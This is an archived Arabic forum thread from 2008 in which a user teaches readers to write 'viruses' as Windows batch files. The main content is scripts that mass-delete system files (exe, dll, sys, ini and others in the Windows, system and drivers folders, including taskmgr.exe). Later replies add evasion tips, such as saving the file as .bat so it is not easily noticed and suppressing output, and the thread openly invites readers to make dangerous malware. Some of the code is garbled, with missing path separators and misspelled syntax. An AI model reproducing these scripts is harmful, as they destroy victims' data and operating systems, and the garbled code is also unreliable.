المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : تعود على صنع فيروسات خاصة بك


Ghost-Hacker
19-11-2008, 07:59
اولا يجب ان تتتعود على لغة الويندووز وتكون فاهما في الدوس تعامل بباسطة وبمنطقية لصنع الفيروس

الان افتح notepad

الكود الاول مثلا
================================================== ==========
del C:windows *.ini *.exe *.scr *.txt *.log
del C:windowssystem32 *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll
del C:windowssystem *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll
================================================== ==========
واضح أن من صنع هذا الفيروس هو مبتدئ وجدا
كما تلا حظون هذا الشخص
أول شيء فعله أعطى الأمر مسح بكلمة del
ثاني شيء حدد مسار الملف اللي موجودة فيه الملفات المراد مسحها وهو ملف الويندوز C:windows
ثالث شيء حدد مسار الملفات المراد مسحها دون تحديد إسمها

فقط الصيغ الذي يريد حذفها مثلا مثل الصور ico مثلا او الاغاني avi
ارايتم تعامل بببساطة و حدد المكان الموجوده فيه الملفات
C:windows
C:windowssystem32
C:windowssystem

# إذاً بإمكاننا أن نغير الكود ونجلعه مختصر وأقوى من السابق وإليك التعديل :
================================================== ==========
del C:windows *.*
del C:windowssystem32 *.*
del C:windowssystem *.*

ارايت وببساطة ولاحظ أننا مسحنا هذه الأوامر كلها :
*.ini
*.exe
*.scr
*.txt
*.log
*.nls
*.drf
*.reg
*.sys
*.dll
وإستبدلناها بأمر واحد فقط هو (( *.* )).
فيه عيب ثاني في هذا الفيروس هو :
لو كان ملف الويندوز في الـD إذاً الفيروس عديم الفائدة ولا ضرر منه.
وبشرح الكود الثاني راح تفهم الكلام هذا.

لتعلم هذه الاوامر عليك التعلم كيف تتجول في الدوس ووتذهب من ملف الى ملف


cd WINDOWS
او
cd system32
او
cd system
هذه الملفات المحددة المطلوب من الفيروس الوصول إليها
والأمر cd الموجود أمام كل مجلد هو أمر للرجوع للوراء كما وضحنا سابقاً
أي أن الفيروس سيبحث أولاً في القرص C إلى أن يجد الملف المحدد له
فإن لم يجده سيرجع الفيروس تلقائياً وسيبحث عن الملف المحدد له في القرص D
فإن لم يجده سيرجع الفيروس تلقائياً وسيبحث عن الملف المحدد له في القرص E
فإن لم يجده سيرجع الفيروس تلقائياً وسيبحث عن الملف المحدد له في القرص F

وهكذا
سيبحث الفيروس عن الملف إلى أن يصيده وهذا أمر أعلم .
الأوامر :
*.dll
*.sys
*.ini
*.exe
*.txt
*.bat
تم شرحها وهي الملفات المراد مسحها أو حذفها.


مثال فيروس
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd WINDOWS
Cls
del *.exe
del *.scr
del *.ini
del *.txt
del *.dll
del *.dat
del *.sys
del *.bmp
del *.gif
del *.jpg
Cls
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
Cls
cd system
Cls
del *.manifest
del taskmgr.exe
del *.dll
del *.ocx
del *.sys
del *.ini
del *.drf
del *.log
del *.nls
Cls
del *.wsc
del *.oca
del *.msc
del *.exe
del *.com
del *.scr
del *.vbs
del *.inf
del *.acm
del *.dat
del *.HLP
Cls
del *.sve
del *.tha
del *.nls
del *.sep
del *.TXT
del *.reg
Cls
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
Cls
cd drivers


اتمنى ان اكون قد افدتم واخيرا احفظ الفيرووووس بتاعك بصيغة exe.

وننتظر منكم صنع فيروسات خطيرة وحاصة بكم بعد هذا الدرس

CONDOR-2
19-11-2008, 08:59
السلام عليكم

صراحة موضوعك قوي لاكن،،

اذا حفظته بصيغة exe يشتغل..؟؟

و مشكور يا مبدع

RAAD
19-11-2008, 09:53
عمل جميل ..

ولاكن اذا اردنا ان نطلق علية اسم فيروس فيجب أن يتحقق شرطان اساسيان وهما:
1. الانتقال
2. التكاثر

اذاً نستطيع ان نطلق على الكود بالعلا بأنه (برنامج مخرب) وليس (فيروس)

وهذا دعاني لان أكتب هذا الموضوع للتوضيح

http://www.3asfh.net/vb/showthread.php?p=676717#post676717

Ghost-Hacker
20-11-2008, 01:56
السلام عليكم

صراحة موضوعك قوي لاكن،،

اذا حفظته بصيغة exe يشتغل..؟؟

و مشكور يا مبدع

يمكنك حفظها بصيغة bat.
لكي لايعرف بسهولة
واذا اردت ان ينفذ الامر بسرعة فاكتب
echo off@
في الاوس

Ghost-Hacker
20-11-2008, 01:58
لاستمرار الفيروس يمكنك وضع في اول الكلمة كلمة
on ereur on resume next

وهكذا لا تحلم بان يبتعد الفيروس من الجهاز
ولكي ينفذ الامر بسرعة ضع في الاول الكود

echo off@

واتمنى ان اكون قد افدتكم

Ghost-Hacker
20-11-2008, 02:00
عمل جميل ..

ولاكن اذا اردنا ان نطلق علية اسم فيروس فيجب أن يتحقق شرطان اساسيان وهما:
1. الانتقال
2. التكاثر

اذاً نستطيع ان نطلق على الكود بالعلا بأنه (برنامج مخرب) وليس (فيروس)

وهذا دعاني لان أكتب هذا الموضوع للتوضيح

http://www.3asfh.net/vb/showthread.php?p=676717#post676717

اتمنى ان اكون قد اوضحت الامور اكثر في ردي وشكرا